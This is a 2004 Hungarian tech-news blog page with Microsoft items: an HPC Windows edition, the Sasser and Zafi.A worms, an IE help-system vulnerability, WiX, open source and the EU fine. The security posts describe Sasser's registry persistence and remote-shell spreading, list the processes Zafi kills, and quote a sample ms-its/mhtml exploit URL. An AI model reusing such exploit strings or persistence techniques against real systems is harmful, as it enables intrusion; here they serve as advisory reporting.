Microsoft, Windows

Jön a Microsoft Windows Server HPC Edition

Úgy tűnik, hogy a Microsoft vezetése megelégelte, hogy a nagy számítási teljesítményű (HPC - High Performance Computing) gépeken a felhasználók jelentős része Linuxot futtat, és hogy az MS a piacnak eme szeletéből nem tudja kiszakítani a saját részét. A Microsoft egy új operációs rendszer fejlesztésébe kezd. Az OS neve Microsoft Windows Server HPC Edition lesz.

Nem ez lesz az első próbálkozás a Microsoft részéről arra, hogy visszaszorítsa a Linux egyre szélesebb körű elterjedését. A Windows 2003 Server megjelenésekor az MS kiadott egy olcsó Web szerver kiadást a termékből, amelytől azt remélte, hogy nagyobb piaci részesedést szerezhet a Web szerverek terén, ahol egyértelműen nem a Windows + IIS kombó a nyerő.

A kérdés az, hogy a Microsoft, mint újonc ezen a területen, mivel tudja majd meggyőzni a kutatókat, egyetemeket, render farmok üzemeltetőit arról, hogy érdemes nekik az olcsó és kiváló teljesítményű Linux helyett a Windows-t választani.

A ZDNet cikke itt.

Az Internet Storm Center sárga jelzésű figyelmezetetést adott ki, amely arra hívja fel a figyelmet, hogy egy Sasser névre hallgató féreg jelent meg és terjed rohamosan az Interneten. A féreg a Windows 2000 és XP operációs rendszerek Local Security Authority Subsystem Service (LSASS) rendszerében található hibát használja ki. A sebezhetőséget a Microsoft a Microsoft Bulletin MS04-011-es hibajelentésben publikálta pár nappal ezelőtt. Az előzetes elemzések azt mutatják, hogy a féregnek klasszikus Blaster-stílusú a viselkedése. A megfigyelések szerint tegnap már kb. 10 percenként lehetett Sasser-re mutató aktivitást felfedezni a tűzfal logokban. A féreg működése:

1.) Megpróbál egy ún. Jobaka3l mutexet létrehozni. Ha ez nem sikerül, akkor kilép. Ezzel biztosítja, hogy csak egy példányban fusson.

2.) Bemásolja magát a %Windir%avserve.exe helyre, és bejegyzi magát a registry-be az alábbi helyeken:

"avserve.exe"="%Windir%avserve.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

ezzel a féreg biztosítja, hogy minden rendszer induláskor elinduljon.

3.) Az AbortSystemShutdown API-n keresztül megakadályozza, hogy rebootoljuk vagy újraindítsuk a gépet.

4.) FTP szervert indít a 5554-es TCP porton, amely biztosítja a vírus továbbterjedését.

5.) Random generált IP címekhez próbál csatlakozni a 445-ös TCP porton. Ha a kapcsolat sikerül, akkor a féreg shellcode-ot küld, amely a 9996-os TCP porton egy távoli shell-t nyit. A távoli shellen visszacsatlakozik a fertőzött gép FTP szerverére és áttölti a férget magát.

A nagyobb vírusírtok már fogják a férget. Bővebben a AV gyártóknál: CA, F-Secure, Symantec.

Megelőzés: használjon mindenki csomagszűrőt!

Hát nem erre vártunk rég? :-))

A The Inqurier szerint a TurboLinux olyan media playert készített Linux operációs rendszerre, amely Microsoft-tól licencelt kódokat is magában foglal.

Főleg mail kiszolgálót üzemeltetők figyelmébe!

Új víruscsoda: I-Worm.Zafi.A

Az éjszakai, hajnali órákban kezdett intenzíven terjedni a kis károkozó. A Vírusbuster már megfogja!Íme a Vírusbuster levelének részlete:

Vírus riasztás: I-Worm.Zafi.A (2004. április 19.)


Tisztelt Felhasználó!

A következő vírus felbukkanását és terjedését jelezték több helyről: I-Worm.Zafi.A


Új, e-mailen terjedő magyar vírus indult rohamos terjedésnek. A Zafi.A virtuális képeslapnak álcázott, magyar szövegű üzenetekben terjed. A levél melléklete a 11776 bájt hosszúságú, COM kiterjesztésű vírus. A férget a VirusBuster programok a 7.941-es, illetve annál újabb adatbázissal ismerik fel.

Nagyon kis disznó, hihetetlenül agresszív, az elmúlt két órában több, mint 4000 darabot fogtunk belőle!

Lelassítja a gépet, letiltja a regedit-et, valamint a következő progikat:

zonalarm.exe vbsntw.exe vbcons.exe pccguide.exe outpost.exe regedit.exe regedit32.exe navapw32.exe pcciomon.exe navdx.exe navstub.exe navw32.exe nc2000.exe ndd32.exe netmon.exe netarmor.exe netinfo.exe nmain.exe nprotect.exe ntvdm.exe ostronet.exe vsmain.exe vsmon.exe vsstat.exe vbust.exe mcagent.exe fsav32.exe fssm32.exe fsm32.exe fsbwsys.exe fsgk32.exe dfw.exe tnbutil.exe taskmgr.exe winlogon.exe

Postfix+VBMailShield egyelőre állja a sarat! :)

Úgy tűnik, hogy átgondolták az MS-nél a szoftver licenc politikát, mert ismét egy szabadon letölthető anyagot jelentettek be.

Ezúttal egy fejlesztő-eszköz van soron. A tool amellett, hogy letölthető, tulajdonképpen szabadon felhasználható (ezt ők állítját, az EULA-t nem olvastam el, ha valaki elolvasta mondja el mi van benne :-).A Visual C++ Toolkit 2003 csomag olyan alapvető anyagokat tartalmaz, amellyel a fejlesztők C++-alapú alkalmazásokat tudnak lefordítani és linkelni Windows és .NET Common Language Runtime környezetre. A csomag tartalmaz fordítót, linkert, library-kat, és minta kódokat.

A letöltő oldalon a Q&A-ban ez olvasható:

[...]

Van valamimegkötés, hogy hogyan használhatom a Visual C++ Toolkit-et?

Általában nincs. Felhasználhatod a Toolkit-et arra, hogy vele C++ alkalmazásokat fordíts le, és azokat terjeszd. Olvasd el az End User License Agreement-et (EULA), amelyet tartalmaz a Toolkit, a részletekért.

A fordítóprogram letölthető innen.

Már ezek a dolgok is meglepőek voltak számomra, de a meglepetés a végén ért:

A cucchoz nem jár technikai támogatás, de online dokumentáció elérhető hozzá. A MS azt javasolja (most jön a lényeg) a kérésekkel forduljunk a programozói hírcsoportokhoz és a közösségi fórumokhoz :-)

Na ilyet se láttam még tőlük. Lehet a végén még megérjük a Windows teljes forráskódjának GPL-es kiadását is? :-)



(Bár szerintem valami csont csak van az EULA-ban, mert így túl szép lenne ahhoz, hogy igaz legyen :-)

Új sebezhetőséget fedeztek fel a biztosággal foglalkozó szakemberek a minap a Windows operációs rendszerek help rendszerében. A CERT jelentése szerint a jelentős hibának minősíthető sebezhetőség azokat érinti, akik Internet Exploler böngészőt vagy Outlook levelezőt használnak. A hibára jelenleg javítás és vírus definíciós file nincs, viszont exploit az már van ``in wild'', azaz közkézen. A CERT szerint minden olyan Windows rendszer érintett a hibában amelyik Internet Explolert futtat. A hiba egy ún. ``cross-domain scripting vulnerability'' az IE-ben, amely lehetővé teszi a támadónak, hogy tetszőleges kódot futtasson annak a felhasználónak a neve alatt, amely az IE-t futtatja (ami tapasztalataim szerint számos esetben a ``administrator'' felhasználó - trey).



A ``támadó'' oldal vagy levél az alábbihoz hasonló üzenetet tartalmazhat:


ms-_its:mhtml:file://C:
osuchfile_mht!http://www.example.com//exploit_chm::exploit_html



Nem csak az IE böngészőt használók érintettek, hanem azok is akik Outlook alatt HTML tartalmú leveleket olvasnak (pl. spam-ok, hírlevelek, stb.).

Van workaround a hibára. Registry módosítással (ITS protocol handlers letiltással), és az IE böngésző biztonsági szintjének emelésével (pl. Active-X letiltással, azzal, hogy nem clikk-elük bejövő email-re, instant üzenetekre, web fórumokon található linkekre, Internet relay chat (IRC) csatornák linkjeire, stb.) segíthetünk magunkon.

Szerintem egyszerűbb Mozillát használni :-)

A hiba bejelentése itt.

``WiX v2.0.1605.0 - Microsoft's first OSS project'' - ezzel az összegzéssel fut a MicroSoft első SourceForge-os projektje.

A Microsoft hű maradt múlt heti ígéretéhez és kódot adott ki. A microsoftos Shared Source Initiative szervezet a Windows Installer XML (WiX) kódját tette ma reggel elérhetővé a Sourceforge-on.A mai naptól kezdve letölthető a Windows Installer XML (WiX) fejlesztői eszköz a SourceForge oldalról, az IBM Common Public License (CPL) alatt.

Kiváncsian várom, hogy mikor fog az MS csatlakozni az OSDL-hez :-)

Bővebben itt, és egy kis önfényezés itt.

A Microsoft azután, hogy évekig szidalmazta a nyílt forráskódot, most egyes források szerint megváltoztatja álláspontját és arra készül, hogy maga is nyílt forrású kódokat adjon ki.

A Microsoft Shared Source Initiative egyik tagja azt állította a ComputerWire-nek, hogy a nyílt forrású kód ``jön''. Stephen Walli platform business development manager hozzátette, hogy a Microsoft nem ``core'' kódokat fog kiadni. A nem core kódok alatt azt kell érteni, hogy nem operációs rendszer kódok kerülnek publikálásra.

``Miért ne szponzoráljunk egy közösséget?" - kérdezte a menedzser.

A redmondi cég szóvivője szerint a kódok Shared Source licenc alatt lesznek publikálva.

Érdekes a cég álláspontjának változása, hiszen az MS felső vezetése - beleértve Bill Gates-et is - pár évvel ezelőtt még azt szajkózta, hogy a nyílt forráskód elpusztítja a kereskedelmi szoftver-készítő ipart (ezt nálunk többen is szajkózzák). Talán új szelek fújnak?

Zárójelben megjegyzendő, hogy annak ellenére, hogy a nyílt forráskód az MS szerint a szoftverek rákfenéje (volt?), azokat előszeretettel építette/építi be saját termékébe. Például

a Unix Services for Windows termék 25 GPL-es eszközt tartalmaz. Többek közt a GCC fordítót. Emellett szép számban találhatunk náluk BSD kódokat is. A Unix Services for Windows OpenBSD-re épül, de az MS által kiadott licencekben szereplő copyright sorok arra engednek következtetni, hogy nem vetik meg a FreeBSD kódokat sem.

A Comuter Business cikke itt

Az egyik hírportálon egy érdekes hirdetésre bukkantam, s arra gondoltam, hogy megnézem...



Ezt láttam.

"Rekordméretű, csaknem félmilliárd eurós pénzbüntetést szabott ki az Európai Unió versenyhatósága a Microsoftra. A döntés értelmében a Microsoftnak fejlesztési információkat kell megosztania versenytársaival és el kell távolítania a Mediaplayert a Windowsból. A döntés kártérítési perek előtt is megnyithatja az utat.""Ötéves eljárás után az Európai Unió történetének eddigi legnagyobb pénzbüntetését, 497 millió eurós bírságot rótt ki szerdán délelőtt az Unió versenyhatósága a Microsoftra, amiért erőfölényével súlyosan visszaélve megpróbálta korlátozni a versenyt az európai IT-piacon, megsértve az uniós versenyjogot."

"A döntés fő jelentősége azonban abban áll, hogy kártérítési perek előtt is megnyithatja az utat, kolosszális összegek kifizetésének rémével fenyegetve a redmondi szoftveróriást. "Ha a Bizottság kimondja, hogy a Microsoft uniós jogot sértett, akkor bárki elmehet egy bíróságra és azt mondhatja, hogy engem megkárosított a Microsoft, fizessen kártérítést" - magyarázta egy versenyjogi illetékes."

"A döntés másik pontja arra kötelezi a céget, hogy a Windowsnak ezentúl két különböző verzióját forgalmazza: Mediaplayerrel és anélkül. Erre azért van szükség, mert ha a hang- és videofile-ok lejátszására való program alapból benne van a Windowsban, az szintén versenyelőnyhöz juttatja a Microsoftot ezen alkalmazások piacán a többi fejlesztővel szemben. "Ki vásárolna új lejátszót, még ha az sokkal jobb is, mint a Mediaplayer, ha már eleve van egy ilyen szoftver a gépén?" - illusztrál a már idézett illetékes."

" Örvendezett, és "nagy jelentőségűnek" minősítette a Realnetworks és a Sun Microsystem az Európai Bizottság álláspontját, amely szerint törvénysértő a Media Playernek a Windows rendszerébe történő integrálása - jegyezte meg közleményében a Microsoft két fő amerikai vetélytársa.

A Sun Microsystem, amely az amerikai bíróságon ütközött meg a Microsofttal, szintén úgy látja, hogy Brüsszel "precedensértékű döntést " hozott. - Nem csak az európai fogyasztók számára született jelentős döntés, hanem világméretekben is fontos a fejlesztések és a verseny ösztönzése szempontjából- olvasható a cég közleményében. "

A teljes cikk az Index oldalain itt.

A linkért köszönet kasa olvasónknak.